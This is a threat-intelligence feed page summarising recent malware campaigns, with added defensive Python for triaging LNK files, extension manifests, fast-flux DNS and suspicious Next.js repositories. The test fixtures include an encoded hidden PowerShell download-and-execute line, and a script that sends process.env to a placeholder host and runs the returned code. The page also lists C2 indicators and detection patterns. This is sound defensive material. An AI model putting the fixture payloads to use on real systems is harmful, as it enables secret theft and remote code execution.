LATEST THREAT INTELLIGENCE.
Chrome Extensions: Are you getting more than you bargained for?
Description: This analysis reveals the hidden dangers of certain Chrome extensions available on the Google Chrome Web Store. Despite the store's vetting process, some malicious extensions have slipped through, compromising user security. The study examines four extensions with a combined user base exceeding 100,000, each illustrating a different security risk: clipboard contents sent to remote domains without disclosure, data exfiltration, remote code execution capabilities, search hijacking, and cross-site scripting vulnerabilities. The extensions employ tactics such as command-and-control infrastructure with domain generation algorithms, user tracking, and brand impersonation. The research emphasizes the importance of caution when installing browser extensions, even from trusted sources, and recommends immediate uninstallation of the identified malicious extensions.
Created at: 2026-01-26T15:40:31.078000
Updated at: 2026-02-25T15:02:40.499000
Malware MoonPeak Executed via LNK Files
Description: In January 2026, IIJ observed malicious LNK files targeting Korean users to execute the MoonPeak malware, attributed to North Korean threat actors. The infection chain begins with an LNK file that runs an obfuscated PowerShell script, which checks for analysis environments, creates additional scripts, and sets up persistence. The second stage downloads and executes a payload from GitHub, which is MoonPeak itself. MoonPeak is obfuscated with ConfuserEx and communicates with a C2 server. Hosting the malware on GitHub is an instance of Living Off Trusted Sites (LOTS): the attacker uses a legitimate, widely trusted service so that the download blends into normal traffic and is unlikely to be blocked by reputation. This attack demonstrates the ongoing threat posed by North Korean actors targeting various countries and individuals worldwide.
Created at: 2026-01-26T14:28:48.027000
Updated at: 2026-02-25T14:02:21.153000
Inside the Fix: Analysis of In-the-Wild Exploit of CVE-2026-21513
Description: This analysis examines CVE-2026-21513, a security bypass vulnerability in Microsoft's MSHTML framework, patched in February 2026. The flaw, actively exploited by the Russian state-sponsored actor APT28, affects all Windows versions and carries a CVSS score of 8.8. Using PatchDiff-AI, researchers located the root cause in ieframe.dll's hyperlink navigation handling, which allowed arbitrary file execution outside the browser's security context. The exploit is a crafted Windows Shortcut (LNK) file with embedded HTML that communicates with APT28-linked infrastructure. It bypasses Mark of the Web and IE Enhanced Security Configuration through nested iframes and DOM manipulation, ultimately invoking ShellExecuteExW for out-of-sandbox execution.
Created at: 2026-02-25T11:46:21.970000
Updated at: 2026-02-25T11:50:33.555000
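Both the MoonPeak chain and the CVE-2026-21513 exploit above start from a Windows Shortcut (.LNK) file, so the first triage step in either case is to pull the target, arguments and any appended data out of the shortcut without executing it. The Python below is an added example written for this page, not code from IIJ, Microsoft or the cited researchers. It walks the MS-SHLLINK layout directly, decodes a PowerShell -EncodedCommand if one is present, and flags the traits the two reports describe: a hidden window, a download-and-execute command line, and HTML appended after the shortcut's structures. The sample shortcut is constructed inline with a placeholder GitHub URL; the regex list and thresholds are the author's choices, not indicators from either report.

```python
import base64
import re
import struct

# Shell Link (.LNK) layout per MS-SHLLINK: 76-byte header, optional LinkTargetIDList
# and LinkInfo, length-prefixed StringData, then ExtraData blocks closed by a 4-byte
# terminal block. Anything after that terminal block is an overlay.
HEADER_SIZE = 0x4C
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80
SW_SHOWMINNOACTIVE = 7  # console starts minimised, so the victim never sees it

# Command-line fragments a benign desktop shortcut almost never carries
# (author's list, not indicators from either report).
SUSPICIOUS = [
    r"\b(powershell|pwsh|mshta|wscript|cscript|rundll32|certutil)\b",
    r"-w(indowstyle)?\s+hidden", r"-nop\b", r"-e(nc|ncodedcommand)?\s",
    r"\b(iex|invoke-expression|downloadstring|downloadfile|invoke-webrequest|iwr)\b",
    r"https?://",
]
OVERLAY_MARKERS = [b"<html", b"<script", b"<iframe", b"<hta:"]


def _read_string(data, off, unicode):
    """StringData item: 2-byte CountCharacters, then ANSI or UTF-16LE text."""
    count = struct.unpack_from("<H", data, off)[0]
    off += 2
    if unicode:
        return data[off:off + 2 * count].decode("utf-16-le", "replace"), off + 2 * count
    return data[off:off + count].decode("latin-1"), off + count


def parse_lnk(data):
    """Walk the structures in order and return the fields an analyst cares about."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE:
        raise ValueError("not a shell link: bad HeaderSize")
    if data[4:20] != LINK_CLSID:
        raise ValueError("not a shell link: bad LinkCLSID")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    info = {"show_command": struct.unpack_from("<I", data, 0x3C)[0]}
    off = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:
        off += 2 + struct.unpack_from("<H", data, off)[0]   # IDListSize + IDList
    if flags & HAS_LINK_INFO:
        off += struct.unpack_from("<I", data, off)[0]       # LinkInfoSize covers the block
    for flag, name in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                       (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                       (HAS_ICON_LOCATION, "icon_location")):
        if flags & flag:
            info[name], off = _read_string(data, off, flags & IS_UNICODE)
    while off + 4 <= len(data):                             # ExtraData blocks
        size = struct.unpack_from("<I", data, off)[0]
        if size < 4:                                        # terminal block
            off += 4
            break
        off += size
    info["overlay"] = data[off:]
    return info


def triage_lnk(data):
    """Return (findings, parsed fields) for one .LNK file's bytes."""
    info = parse_lnk(data)
    findings = []
    args = info.get("arguments", "")
    # Recover the script behind -EncodedCommand (base64 of UTF-16LE) so the
    # patterns below also see what the launcher actually runs.
    m = re.search(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", args, re.IGNORECASE)
    if m:
        try:
            info["decoded_command"] = base64.b64decode(m.group(1)).decode("utf-16-le")
            findings.append("decoded -EncodedCommand: " + info["decoded_command"][:80])
        except (ValueError, UnicodeDecodeError):
            findings.append("-EncodedCommand payload is not valid base64/UTF-16LE")
    haystack = " ".join((info.get("relative_path", ""), args, info.get("decoded_command", "")))
    for pat in SUSPICIOUS:
        if re.search(pat, haystack, re.IGNORECASE):
            findings.append(f"command line matches /{pat}/")
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("ShowCommand=SW_SHOWMINNOACTIVE (window hidden from the user)")
    if len(args) > 260:
        findings.append(f"oversized arguments ({len(args)} chars)")
    for marker in OVERLAY_MARKERS:
        if marker in info["overlay"].lower():
            findings.append(f"data appended after ExtraData contains {marker!r}")
    return findings, info


def build_sample_lnk(target, arguments, show_command=1, appended=b""):
    """Constructed shortcut for the demo: Unicode strings, empty IDList, no LinkInfo."""
    flags = HAS_LINK_TARGET_ID_LIST | HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I", HEADER_SIZE) + LINK_CLSID
    header += struct.pack("<II", flags, 0x20)              # LinkFlags, FileAttributes
    header += b"\x00" * 24                                  # three FILETIMEs, unset
    header += struct.pack("<IIIH", 0, 0, show_command, 0)   # FileSize, IconIndex, ShowCommand, HotKey
    header += b"\x00" * 10                                  # Reserved1/2/3
    idlist = struct.pack("<H", 2) + b"\x00\x00"             # IDListSize, then only the TerminalID

    def ustr(text):
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    return (header + idlist + ustr(target) + ustr("C:\\Windows") + ustr(arguments)
            + struct.pack("<I", 0) + appended)              # terminal ExtraData block, then overlay


def sample_malicious_lnk():
    """Hidden PowerShell fetching stage two from a placeholder GitHub URL, HTML appended."""
    script = ("IEX (New-Object Net.WebClient).DownloadString("
              "'https://raw.githubusercontent.com/example/repo/main/stage2.ps1')")
    encoded = base64.b64encode(script.encode("utf-16-le")).decode()
    return build_sample_lnk(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                            f"-nop -w hidden -enc {encoded}", SW_SHOWMINNOACTIVE,
                            b"<html><body><script>/* dropped stage */</script></body></html>")


def sample_benign_lnk():
    return build_sample_lnk(r"..\..\Program Files\Notepad++\notepad++.exe", "")


if __name__ == "__main__":
    for finding in triage_lnk(sample_malicious_lnk())[0]:
        print("!", finding)
```

Run it against a quarantined .LNK with `triage_lnk(open(path, "rb").read())`; the parser never resolves or launches the target. The overlay check is what catches a shortcut carrying its HTML or script payload after the shell-link structures, which is the shape the CVE-2026-21513 lure takes; the decoded -EncodedCommand is what you would pivot on for the GitHub-hosted second stage in the MoonPeak chain.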
Infrastructure of Interest: Medium Confidence FastFlux
Description: These indicators of compromise (IOCs) were identified through LevelBlue Labs' proprietary collection and threat hunting processes, leveraging AI-driven heuristics to detect anomalous DNS patterns, behavioral analysis of rapid IP rotation, and cross-referenced intelligence from global sinkhole data and network telemetry. The IOCs included in this pulse are associated with fast-flux networks, characterized by constantly changing IP addresses and DNS records to evade detection while maintaining resilient malicious infrastructure for phishing, malware delivery, or C2 operations. Use this data to enhance DNS-based detection rules, identify flux parent domains, and disrupt threat actor network resilience. These indicators have been assigned a medium confidence level regarding their maliciousness. They are therefore subject to further review, and feedback is greatly appreciated.
Created at: 2025-08-07T07:34:03.778000
Updated at: 2026-02-25T11:46:57.559000
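The rapid-rotation behaviour this pulse describes can be scored from passive-DNS data you already hold, which is how you would validate a medium-confidence indicator before blocking it. The Python below is an added example, not LevelBlue Labs' heuristics (which are proprietary). It assumes observations of the form (timestamp, name, answer IP, TTL), uses /24-prefix diversity as an offline stand-in for the ASN diversity a production pipeline would look up, and flags a name whose answers are numerous, spread across networks, short-lived and changing between lookups. The records, names, RFC 5737 addresses and thresholds are all constructed for the demo.

```python
from collections import defaultdict
from ipaddress import ip_network

# Constructed passive-DNS observations: (timestamp, qname, answer IP, TTL).
# relay.example behaves like a flux node, static.shop.example like a small CDN
# pool, www.corp.example like an ordinary host. Addresses are RFC 5737 ranges.
SAMPLE_PDNS = [
    (1000, "relay.example", "192.0.2.15", 60),
    (1000, "relay.example", "198.51.100.7", 60),
    (1300, "relay.example", "203.0.113.44", 60),
    (1300, "relay.example", "192.0.2.88", 60),
    (1600, "relay.example", "198.51.100.130", 120),
    (1600, "relay.example", "203.0.113.9", 120),
    (1900, "relay.example", "192.0.2.15", 60),
    (1900, "relay.example", "203.0.113.201", 60),
    (1000, "static.shop.example", "203.0.113.10", 60),
    (1000, "static.shop.example", "203.0.113.11", 60),
    (1300, "static.shop.example", "203.0.113.12", 60),
    (1300, "static.shop.example", "203.0.113.10", 60),
    (1600, "static.shop.example", "203.0.113.11", 60),
    (1600, "static.shop.example", "203.0.113.13", 60),
    (1000, "www.corp.example", "198.51.100.200", 3600),
    (1300, "www.corp.example", "198.51.100.200", 3600),
]


def flux_features(records):
    """Per-name features: answer diversity, network diversity, lowest TTL, answer-set churn."""
    by_name = defaultdict(list)
    for ts, name, ip, ttl in records:
        by_name[name].append((ts, ip, ttl))
    features = {}
    for name, rows in by_name.items():
        ips = {ip for _, ip, _ in rows}
        # /24 diversity stands in for ASN diversity here; a real pipeline would
        # resolve each address to its ASN and count those instead.
        nets = {str(ip_network(ip + "/24", strict=False)) for ip in ips}
        per_lookup = defaultdict(set)
        for ts, ip, _ in rows:
            per_lookup[ts].add(ip)
        snapshots = [per_lookup[ts] for ts in sorted(per_lookup)]
        changes = sum(1 for a, b in zip(snapshots, snapshots[1:]) if a != b)
        features[name] = {
            "unique_ips": len(ips),
            "unique_nets": len(nets),
            "min_ttl": min(ttl for _, _, ttl in rows),
            "churn": changes / max(len(snapshots) - 1, 1),
        }
    return features


def is_fast_flux(f, min_ips=5, min_nets=3, max_ttl=300, min_churn=0.5):
    """Thresholds are illustrative; tune them against your own telemetry."""
    return (f["unique_ips"] >= min_ips and f["unique_nets"] >= min_nets
            and f["min_ttl"] <= max_ttl and f["churn"] >= min_churn)


def flagged_domains(records):
    return sorted(name for name, f in flux_features(records).items() if is_fast_flux(f))


if __name__ == "__main__":
    for name, f in flux_features(SAMPLE_PDNS).items():
        print(name, f, "FLUX" if is_fast_flux(f) else "")
```

The CDN-like name rotates just as fast as the flux node but stays inside one netblock, which is why network diversity, not IP count alone, carries the decision. To find the flux parent domains the pulse mentions, group the records by registrable domain before computing features so that rotating subdomains of one parent are scored together.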
Mercenary Akula Hits Ukraine-Supporting Financial...
Description: A European financial institution involved in regional development and reconstruction initiatives was targeted by a social engineering attack attributed to the Russia-aligned Mercenary Akula. The attack used a spoofed Ukrainian judicial domain to deliver an email containing a link to a remote access payload. The target was a senior legal and policy advisor involved in procurement. The attack employed a multi-stage extraction process and deployed the Remote Manipulator System, a legitimate remote administration tool. This incident suggests the adversary may be expanding beyond primarily Ukraine-based targeting, potentially probing Ukraine-supporting institutions in Western Europe. The attack aligns with Mercenary Akula's established tactics, including localized social engineering, multi-stage payload delivery, and the use of signed remote administration tools.
Created at: 2026-02-25T11:35:21.172000
Updated at: 2026-02-25T11:44:22.329000
The Latest PlugX Variant Executed by STATICPLUGIN
Description: In January 2026, a new variant of the PlugX malware was observed being used in targeted attacks. Analysis suggests involvement of the UNC6384 APT group, linked to Mustang Panda, targeting government agencies in Southeast Asia. The malware uses a browser updater disguise to download and execute a malicious MSI file, leading to PlugX infection. The STATICPLUGIN downloader uses a revoked code-signing certificate from a Chinese company. The PlugX variant employs DLL sideloading and shellcode execution techniques. Its configuration is encrypted using RC4 and custom encoding. C2 servers were identified as fruitbrat[.]com and 108.165.255[.]97:443. The ongoing improvements to PlugX indicate its continued use in targeted attacks by APT groups.
Created at: 2026-02-25T11:36:09.887000
Updated at: 2026-02-25T11:43:13.025000
A $6,000 Russian Malware Toolkit with Chrome Web Store Guarantee
Description: A new malware-as-a-service toolkit called 'Stanley' is being sold on Russian cybercrime forums for $2,000 to $6,000. It provides a turnkey website-spoofing operation disguised as a Chrome extension, with the premium tier promising guaranteed publication on the Chrome Web Store. The toolkit allows full-page website spoofing, element injection, push notifications, and backup domain rotation. It uses victims' IP addresses for tracking and implements a persistent polling mechanism to communicate with the command and control server. The malware's core attack involves website spoofing via iframe overlay, allowing attackers to harvest credentials while displaying legitimate URLs in the browser's address bar.
Created at: 2026-01-26T08:52:20.218000
Updated at: 2026-02-25T00:02:29.420000
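The four malicious extensions in the earlier Chrome Web Store item and the Stanley toolkit above need the same handful of manifest capabilities to do what they do: clipboard access plus a content script on every page, a search-provider override, a CSP or manifest version that tolerates remote code, and extension pages that can be framed over any site for the iframe overlay. Those are declared in manifest.json, which a reviewer can read before installing. The Python below is an added example, not code from either report; the permission list, wording and the sample manifest are constructed by the author, and the sample is not one of the extensions the reports describe.

```python
import json
import re

BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}

# Permissions that let an extension read or reshape what the user sees and types
# (author's list and wording, not taken from either report).
RISKY_PERMISSIONS = {
    "clipboardRead": "reads the clipboard (passwords, 2FA codes, wallet addresses)",
    "clipboardWrite": "rewrites clipboard contents",
    "webRequest": "observes every request the browser makes",
    "webRequestBlocking": "modifies or blocks every request (MV2)",
    "declarativeNetRequest": "rewrites requests and response headers",
    "cookies": "reads session cookies on granted hosts",
    "history": "reads browsing history",
    "scripting": "injects scripts into pages at runtime",
    "tabs": "reads the URL and title of every open tab",
    "nativeMessaging": "talks to a native host process",
    "management": "can disable other extensions, including security tooling",
    "proxy": "routes all traffic through a proxy of its choosing",
}


def _broad(patterns):
    return any(p in BROAD_HOSTS for p in patterns)


def triage_manifest(manifest):
    """Return human-readable findings for one parsed manifest.json."""
    findings = []
    mv = manifest.get("manifest_version", 2)
    perms = manifest.get("permissions", [])
    hosts = manifest.get("host_permissions", []) if mv >= 3 else perms
    for p in perms:
        if p in RISKY_PERMISSIONS:
            findings.append(f"permission {p}: {RISKY_PERMISSIONS[p]}")
    if _broad(hosts):
        findings.append("host access to every site")
    # Search hijacking: the extension takes over the default search engine or new-tab page.
    provider = manifest.get("chrome_settings_overrides", {}).get("search_provider")
    if provider:
        findings.append(f"replaces the default search provider with {provider.get('search_url')}")
    if manifest.get("chrome_url_overrides", {}).get("newtab"):
        findings.append("replaces the new-tab page")
    # A content script on every page is what a clipboard stealer or overlay phisher needs.
    if any(_broad(cs.get("matches", [])) for cs in manifest.get("content_scripts", [])):
        findings.append("content script injected into every page")
        if "clipboardRead" in perms:
            findings.append("all-page content script combined with clipboardRead")
    # Remote code: a CSP that whitelists a remote script-src or permits eval. Match the
    # quoted token exactly so MV3's legitimate 'wasm-unsafe-eval' does not trip it.
    csp = manifest.get("content_security_policy", "")
    if isinstance(csp, dict):
        csp = csp.get("extension_pages", "")
    if re.search(r"script-src[^;]*https?://", csp) or "'unsafe-eval'" in csp:
        findings.append("CSP allows remote or eval'd script: remote code execution path")
    if mv < 3:
        findings.append("manifest v2: the platform does not block remotely hosted code")
    # Extension pages exposed to every site can be loaded in an iframe over any page
    # while the address bar still shows the victim site's URL (overlay spoofing).
    war = manifest.get("web_accessible_resources", [])
    if war and (mv < 3 or any(isinstance(r, dict) and _broad(r.get("matches", [])) for r in war)):
        findings.append("extension pages web-accessible from every site (framable overlay)")
    return findings


# Constructed sample manifest for the demo, not one of the extensions in the reports.
SAMPLE_MANIFEST = json.loads("""{
  "manifest_version": 3,
  "name": "Quick Search Helper",
  "permissions": ["clipboardRead", "scripting", "tabs", "storage"],
  "host_permissions": ["<all_urls>"],
  "content_scripts": [{"matches": ["<all_urls>"], "js": ["inject.js"]}],
  "chrome_settings_overrides": {"search_provider": {
    "name": "Quick", "keyword": "q", "encoding": "UTF-8", "is_default": true,
    "search_url": "https://search.example/?q={searchTerms}"}},
  "web_accessible_resources": [{"resources": ["overlay.html"], "matches": ["<all_urls>"]}],
  "content_security_policy": {"extension_pages": "script-src 'self' 'wasm-unsafe-eval'; object-src 'self'"}
}""")

BENIGN_MANIFEST = {"manifest_version": 3, "name": "Notes", "permissions": ["storage"]}

if __name__ == "__main__":
    for finding in triage_manifest(SAMPLE_MANIFEST):
        print("!", finding)
```

Point it at an unpacked extension with `triage_manifest(json.load(open("manifest.json")))`. A manifest is not the whole story, since an MV3 extension can still fetch instructions from its C2 and act on them within the permissions it holds, but the combination of `<all_urls>` host access, an all-page content script and web-accessible pages is exactly what the iframe-overlay spoofing in Stanley requires, and a search-provider override is the search hijacking the first report describes.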
Developer-targeting campaign using malicious Next.js repositories
Description: A coordinated campaign is targeting developers through malicious repositories disguised as legitimate Next.js projects and technical assessment materials. The attack uses multiple entry points that lead to runtime retrieval and local execution of attacker-controlled JavaScript, transitioning into staged command-and-control. The campaign employs three main execution paths: Visual Studio Code workspace automation, build-time execution during application development, and server startup execution via environment variable exfiltration and dynamic remote code execution. The attack chain includes a Stage 1 C2 beacon for registration and a Stage 2 C2 controller for persistent tasking. This sophisticated approach allows attackers to blend into routine developer workflows, increasing the likelihood of code execution and potentially compromising high-value assets such as source code, environment secrets, and access to build or cloud resources.
Created at: 2026-02-24T21:29:53.984000
Updated at: 2026-02-24T21:47:41.200000
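The three execution paths described above all leave a footprint in the repository itself before anything runs: a VS Code task configured to run on folder open, a package.json script that executes something other than the framework during install or build, and server-side code that serialises process.env, ships it to a remote host and runs what comes back. The Python below is an added example, not code or indicators from the campaign report; it checks a cloned repository for those three shapes. The heuristics, the placeholder domain and the sample repository contents are constructed by the author.

```python
import json
import re

# Heuristics for the three execution paths the report describes
# (author's patterns, not indicators from the report).
LIFECYCLE_HOOKS = {"preinstall", "install", "postinstall", "prepare",
                   "prebuild", "build", "predev", "dev", "prestart", "start"}
SHELL_RED_FLAGS = re.compile(
    r"\b(curl|wget|node\s+-e|bash\s+-c|sh\s+-c|base64\s+-d|powershell)\b|https?://", re.I)
ENV_SERIALISE = re.compile(
    r"JSON\.stringify\(\s*process\.env\s*\)|Object\.(entries|keys)\(\s*process\.env\s*\)")
NETWORK_SEND = re.compile(r"\bfetch\(|https?\.request\(|axios\.(post|put|get)\(|new\s+XMLHttpRequest")
DYNAMIC_EXEC = re.compile(r"new\s+Function\(|\beval\(|vm\.runIn\w+\(|child_process")
CODE_SUFFIXES = (".js", ".mjs", ".cjs", ".ts")


def scan_repo(files):
    """files maps repo-relative path -> text. Returns one finding per trigger found."""
    findings = []
    # 1. VS Code runs a task marked runOn: folderOpen when the folder is opened,
    #    once the user has allowed automatic tasks for the workspace.
    tasks = files.get(".vscode/tasks.json")
    if tasks:
        for task in json.loads(tasks).get("tasks", []):
            if task.get("runOptions", {}).get("runOn") == "folderOpen":
                findings.append(f".vscode/tasks.json: task {task.get('label')!r} runs on folder open: "
                                f"{task.get('command')!r}")
    # 2. npm lifecycle and build scripts execute during install and build.
    pkg = files.get("package.json")
    if pkg:
        for hook, cmd in json.loads(pkg).get("scripts", {}).items():
            if hook in LIFECYCLE_HOOKS and SHELL_RED_FLAGS.search(cmd):
                findings.append(f"package.json: script {hook!r} runs {cmd!r}")
    # 3. Code that serialises process.env, sends it out, and executes what comes back.
    for path, src in files.items():
        if not path.endswith(CODE_SUFFIXES):
            continue
        if ENV_SERIALISE.search(src) and NETWORK_SEND.search(src):
            findings.append(f"{path}: serialises process.env and sends it over the network")
        if DYNAMIC_EXEC.search(src):
            findings.append(f"{path}: executes dynamically supplied code")
    return findings


# Constructed sample repository (path -> content), not files from the campaign.
SAMPLE_REPO = {
    ".vscode/tasks.json": json.dumps({"version": "2.0.0", "tasks": [{
        "label": "prepare workspace", "type": "shell",
        "command": "node scripts/setup.js",
        "runOptions": {"runOn": "folderOpen"}}]}),
    "package.json": json.dumps({"name": "assessment-app", "scripts": {
        "dev": "next dev",
        "build": "node -e \"require('./scripts/setup.js')\" && next build",
        "start": "next start"}}),
    "scripts/setup.js": (
        "const env = JSON.stringify(process.env);\n"
        "fetch('https://cfg.example/register', {method: 'POST', body: env})\n"
        "  .then(r => r.text()).then(code => new Function(code)());\n"),
    "next.config.js": "module.exports = { reactStrictMode: true };\n",
}
CLEAN_REPO = {
    "package.json": json.dumps({"scripts": {"dev": "next dev", "build": "next build"}}),
    "next.config.js": "module.exports = { reactStrictMode: true };\n",
}

if __name__ == "__main__":
    for finding in scan_repo(SAMPLE_REPO):
        print("!", finding)
```

To scan a real checkout, build the `files` dict by walking the tree and reading text files, skipping node_modules. Run the scan before opening the folder in an editor and before `npm install`, since the first two triggers fire on exactly those actions; the third is the Stage 1 beacon shape, where the environment (and any cloud or build credentials in it) is the registration payload.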
Fake Zoom meeting 'update' silently installs surveillance software
Description: A deceptive campaign is using a fake Zoom meeting website to covertly install Teramind, a commercial monitoring tool, on unsuspecting users' Windows machines. The operation begins with a convincing imitation of a Zoom video call, complete with scripted participants and artificial technical issues. An automatic 'Update Available' prompt then initiates the download of a malicious installer without user consent. The installed software is a covert build of Teramind, designed to run invisibly and avoid detection by security tools. This campaign is particularly dangerous due to its use of legitimate commercial software, which may evade traditional antivirus detection. The attackers exploit users' trust in Zoom and Microsoft to execute their plan, highlighting the importance of verifying meeting links and being cautious with unexpected software updates.
Created at: 2026-02-24T20:39:33.261000
Updated at: 2026-02-24T20:44:50.900000
Nefilim Ransomware
Description: Nefilim ransomware emerged in March 2020, evolving from Nemty's code. It gains initial access by exploiting vulnerabilities in Citrix gateway devices and through exposed Remote Desktop Protocol (RDP). The malware exfiltrates sensitive data before encryption and threatens to publish it if the ransom isn't paid. Nefilim uses tools like PsExec, Mimikatz, and LaZagne for lateral movement and credential theft. It employs AES-128 encryption and drops a ransom note named 'NEFILIM-DECRYPT.txt'. The ransomware has attacked high-profile targets like Toll Group. Mitigation strategies include strong passwords, disabling or restricting internet-exposed RDP, regular backups, software updates, and monitoring for lateral movement and data exfiltration.
Created at: 2026-02-24T17:00:03.998000
Updated at: 2026-02-24T20:37:58.162000
